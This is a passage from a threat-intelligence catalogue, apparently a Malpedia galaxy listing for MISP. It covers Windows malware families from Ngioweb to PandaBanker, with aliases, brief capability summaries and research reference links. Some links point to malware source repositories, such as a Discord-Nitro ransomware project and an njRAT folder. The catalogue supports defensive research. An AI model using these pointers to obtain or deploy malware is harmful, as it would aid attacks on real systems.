https://twitter.com/PhysicalDrive0/status/842853292124360706

Ngioweb (Windows)

The tag is: misp-galaxy:malpedia="Ngioweb (Windows)"

Ngioweb (Windows) is also known as:

Grobios

Table 2300. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb
https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html
https://research.checkpoint.com/ramnits-network-proxy-servers/

Nibiru

The tag is: misp-galaxy:malpedia="Nibiru"

Nibiru is also known as:

Table 2301. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nibiru
https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html

nitlove

The tag is: misp-galaxy:malpedia="nitlove"

nitlove is also known as:

Table 2302. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove
https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html

Nitol

The tag is: misp-galaxy:malpedia="Nitol"

Nitol is also known as:

Table 2303. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/
https://en.wikipedia.org/wiki/Nitol_botnet
https://krebsonsecurity.com/tag/nitol/

win.nitro

Ransomware family which requires payment in Discord gift cards ("Discord Nitro").

The tag is: misp-galaxy:malpedia="win.nitro"

win.nitro is also known as:

Hydra

Table 2304. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro
https://github.com/nightfallgt/nitro-ransomware
https://twitter.com/malwrhunterteam/status/1430616882231578624
https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/

NixScare Stealer

The tag is: misp-galaxy:malpedia="NixScare Stealer"

NixScare Stealer is also known as:

Table 2305. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nixscare
https://twitter.com/3xp0rtblog/status/1302584919592501248

NjRAT

RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim’s camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim’s desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."

It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.

The tag is: misp-galaxy:malpedia="NjRAT"

NjRAT is also known as:

Bladabindi

Table 2306. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
https://asec.ahnlab.com/1369
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/
https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks
https://blog.talosintelligence.com/2021/07/sidecopy.html
http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/
https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt
https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/
https://www.4hou.com/posts/VoPM
https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html
https://blogs.360.cn/post/APT-C-44.html
https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/
https://www.secureworks.com/research/threat-profiles/copper-fieldstone
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html
http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf
https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control
https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf
https://news.sophos.com/en-us/2020/05/14/raticate/
https://securelist.com/apt-trends-report-q2-2019/91897/
http://blogs.360.cn/post/analysis-of-apt-c-37.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt
https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g
https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html
https://labs.k7computing.com/?p=21904
https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html
https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services
https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/
https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/
https://ti.360.net/blog/articles/analysis-of-apt-c-27/
https://blog.reversinglabs.com/blog/rats-in-the-library
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf
https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

nmass malware

It’s .NET Rat with harcoded key

The tag is: misp-galaxy:malpedia="nmass malware"

nmass malware is also known as:

Table 2307. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nmass
https://sebdraven.medium.com/a-net-rat-target-mongolia-9c1439c39bc2

Nocturnal Stealer

The tag is: misp-galaxy:malpedia="Nocturnal Stealer"

Nocturnal Stealer is also known as:

Table 2308. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer
https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

Nokki

Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.

The tag is: misp-galaxy:malpedia="Nokki"

Nokki is also known as:

Table 2309. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki
https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

NoxPlayer

The tag is: misp-galaxy:malpedia="NoxPlayer"

NoxPlayer is also known as:

Table 2310. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer
https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

Nozelesn (Decryptor)

The tag is: misp-galaxy:malpedia="Nozelesn (Decryptor)"

Nozelesn (Decryptor) is also known as:

Table 2311. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor

nRansom

The tag is: misp-galaxy:malpedia="nRansom"

nRansom is also known as:

Table 2312. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom
https://twitter.com/malwrhunterteam/status/910952333084971008
https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin
https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/

NuggetPhantom

NSFOCUS describes PhantomNugget as a modularized malware toolkit, that was spread using EternalBlue. Payloads included a RAT and a XMRig miner.

The tag is: misp-galaxy:malpedia="NuggetPhantom"

NuggetPhantom is also known as:

Table 2313. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nugget_phantom
https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/
https://staging.nsfocusglobal.com/wp-content/uploads/2018/10/NuggetPhantom-Analysis-Report-V4.1.pdf

Numando

The tag is: misp-galaxy:malpedia="Numando"

Numando is also known as:

Table 2314. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.numando
https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/
https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/

NVISOSPIT

The tag is: misp-galaxy:malpedia="NVISOSPIT"

NVISOSPIT is also known as:

Table 2315. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit
http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf
https://twitter.com/Bank_Security/status/1134850646413385728
https://twitter.com/r3c0nst/status/1135606944427905025

Nymaim

The tag is: misp-galaxy:malpedia="Nymaim"

Nymaim is also known as:

nymain

Table 2316. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
https://www.cert.pl/en/news/single/nymaim-revisited/
https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/
https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled
https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded
https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/
https://bitbucket.org/daniel_plohmann/idapatchwork
https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/
https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0
https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf
https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim
https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/
https://www.lawfareblog.com/what-point-these-nation-state-indictments

Nymaim2

The tag is: misp-galaxy:malpedia="Nymaim2"

Nymaim2 is also known as:

Table 2317. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2
https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/

Oblique RAT

The tag is: misp-galaxy:malpedia="Oblique RAT"

Oblique RAT is also known as:

Table 2318. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat
https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://securelist.com/transparent-tribe-part-2/98233/
https://www.secrss.com/articles/24995
https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

Obscene

The tag is: misp-galaxy:malpedia="Obscene"

Obscene is also known as:

Table 2319. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene
https://habr.com/ru/post/27053/
https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html

Oceansalt

The tag is: misp-galaxy:malpedia="Oceansalt"

Oceansalt is also known as:

Table 2320. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Octopus (Windows)

The tag is: misp-galaxy:malpedia="Octopus (Windows)"

Octopus (Windows) is also known as:

Table 2321. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus
https://securelist.com/octopus-infested-seas-of-central-asia/88200/
https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw
https://isc.sans.edu/diary/26918

OddJob

The tag is: misp-galaxy:malpedia="OddJob"

OddJob is also known as:

Table 2322. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob

Odinaff

The tag is: misp-galaxy:malpedia="Odinaff"

Odinaff is also known as:

Table 2323. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff
https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

Okrum

a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.

The tag is: misp-galaxy:malpedia="Okrum"

Okrum is also known as:

Table 2324. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/
https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

OLDBAIT

According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28. It targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data. In some places it is mistakenly named "Sasfis", which however seems to be a completely different and unrelated malware family.

The tag is: misp-galaxy:malpedia="OLDBAIT"

OLDBAIT is also known as:

Sasfis

Table 2325. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait
https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf
https://www.secjuice.com/fancy-bear-review/

Olympic Destroyer

Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.

The tag is: misp-galaxy:malpedia="Olympic Destroyer"

Olympic Destroyer is also known as:

SOURGRAPE

Table 2326. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer
https://www.youtube.com/watch?v=a4BZ3SZN-CI
http://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too
https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/
https://www.lastline.com/labsblog/olympic-destroyer-south-korea/
https://www.youtube.com/watch?v=1jgdMY12mI8
https://securelist.com/the-devils-in-the-rich-header/84348/
https://www.youtube.com/watch?v=wCv9SiSA7Sw
https://www.lastline.com/labsblog/attribution-from-russia-with-code/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/
https://securelist.com/olympic-destroyer-is-still-alive/86169/
https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights
http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/
https://www.mbsd.jp/blog/20180215.html
https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/

ONHAT

The tag is: misp-galaxy:malpedia="ONHAT"

ONHAT is also known as:

Table 2327. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat
https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Oni

Ransomware.

The tag is: misp-galaxy:malpedia="Oni"

Oni is also known as:

Table 2328. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oni
https://www.bleepingcomputer.com/news/security/oni-ransomware-used-in-month-long-attacks-against-japanese-companies/

OnionDuke

OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites.

The tag is: misp-galaxy:malpedia="OnionDuke"

OnionDuke is also known as:

Table 2329. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke
https://blog.f-secure.com/podcast-dukes-apt29/
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/
https://www.secureworks.com/research/threat-profiles/iron-hemlock
https://www.f-secure.com/weblog/archives/00002764.html
http://contagiodump.blogspot.com/2014/11/onionduke-samples.html

OnlinerSpambot

A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.

The tag is: misp-galaxy:malpedia="OnlinerSpambot"

OnlinerSpambot is also known as:

Onliner
SBot

Table 2330. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner
https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/
https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html
https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html

OopsIE

The tag is: misp-galaxy:malpedia="OopsIE"

OopsIE is also known as:

Table 2331. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

Opachki

The tag is: misp-galaxy:malpedia="Opachki"

Opachki is also known as:

Table 2332. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki
https://forum.malekal.com/viewtopic.php?t=21806
https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519
http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html
http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html

OpenSUpdater

The tag is: misp-galaxy:malpedia="OpenSUpdater"

OpenSUpdater is also known as:

Table 2333. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.opensupdater
https://blog.google/threat-analysis-group/financially-motivated-actor-breaks-certificate-parsing-avoid-detection/

OpGhoul

This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.

The tag is: misp-galaxy:malpedia="OpGhoul"

OpGhoul is also known as:

Table 2334. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul
https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/

OpBlockBuster

The tag is: misp-galaxy:malpedia="OpBlockBuster"

OpBlockBuster is also known as:

Table 2335. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster
http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/

ORANGEADE

FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.

The tag is: misp-galaxy:malpedia="ORANGEADE"

ORANGEADE is also known as:

Table 2336. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

OrcaRAT

OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.

The tag is: misp-galaxy:malpedia="OrcaRAT"

OrcaRAT is also known as:

Table 2337. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat
http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html
https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

Orcus RAT

Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.

The tag is: misp-galaxy:malpedia="Orcus RAT"

Orcus RAT is also known as:

Schnorchel

Table 2338. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat
https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html
https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors
https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html
https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/
https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/
http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/

Ordinypt

This malware claims to be a ransomware, but it’s actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration).

The tag is: misp-galaxy:malpedia="Ordinypt"

Ordinypt is also known as:

GermanWiper
HSDFSDCrypt

Table 2339. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt
https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html
https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/
https://www.gdata.de/blog/2017/11/30151-ordinypt
https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/

Oski Stealer

The tag is: misp-galaxy:malpedia="Oski Stealer"

Oski Stealer is also known as:

Table 2340. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.oski
https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer
https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/
https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/
https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view
https://twitter.com/albertzsigovits/status/1160874557454131200

Osno

The tag is: misp-galaxy:malpedia="Osno"

Osno is also known as:

Babax

Table 2341. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.osno
https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit
https://labs.k7computing.com/?p=21562

Ousaban

The tag is: misp-galaxy:malpedia="Ousaban"

Ousaban is also known as:

Table 2342. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ousaban
https://www.welivesecurity.com/2021/05/05/ousaban-private-photo-collection-hidden-cabinet/

OutCrypt

Ransomware.

The tag is: misp-galaxy:malpedia="OutCrypt"

OutCrypt is also known as:

Table 2343. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt
https://id-ransomware.blogspot.com/2020/07/outcrypt-ransomware.html

Outlook Backdoor

The tag is: misp-galaxy:malpedia="Outlook Backdoor"

Outlook Backdoor is also known as:

FACADE

Table 2344. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor
https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf
https://twitter.com/VK_Intel/status/1085820673811992576
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

Overlay RAT

The tag is: misp-galaxy:malpedia="Overlay RAT"

Overlay RAT is also known as:

Table 2345. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat
https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/
https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking

OvidiyStealer

The tag is: misp-galaxy:malpedia="OvidiyStealer"

OvidiyStealer is also known as:

Table 2346. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer
https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses

owaauth

The tag is: misp-galaxy:malpedia="owaauth"

owaauth is also known as:

luckyowa

Table 2347. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth
https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/
https://www.secureworks.com/research/threat-profiles/bronze-union

Owlproxy

The tag is: misp-galaxy:malpedia="Owlproxy"

Owlproxy is also known as:

Table 2348. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy
https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/
https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20
https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

OZH RAT

The tag is: misp-galaxy:malpedia="OZH RAT"

OZH RAT is also known as:

Table 2349. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ozh_rat
https://twitter.com/BushidoToken/status/1266075992679948289

Ozone RAT

The tag is: misp-galaxy:malpedia="Ozone RAT"

Ozone RAT is also known as:

Table 2350. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ozone
https://www.fortinet.com/blog/threat-research/german-speakers-targeted-by-spam-leading-to-ozone-rat.html

PadCrypt

The tag is: misp-galaxy:malpedia="PadCrypt"

PadCrypt is also known as:

Table 2351. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt
https://johannesbader.ch/2016/03/the-dga-of-padcrypt/
https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/

paladin

Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.

The tag is: misp-galaxy:malpedia="paladin"

paladin is also known as:

Table 2352. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin
https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf
https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

PandaBanker

According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.

This banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.

The baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.

Panda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.

The tag is: misp-galaxy:malpedia="PandaBanker"

PandaBanker is also known as:

ZeusPanda

Table 2353. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker
https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker
https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/
https://www.youtube.com/watch?v=J7VOfAJvxEY
https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers
https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/
https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media
https://www.spamhaus.org/news/article/771/
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware
http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf
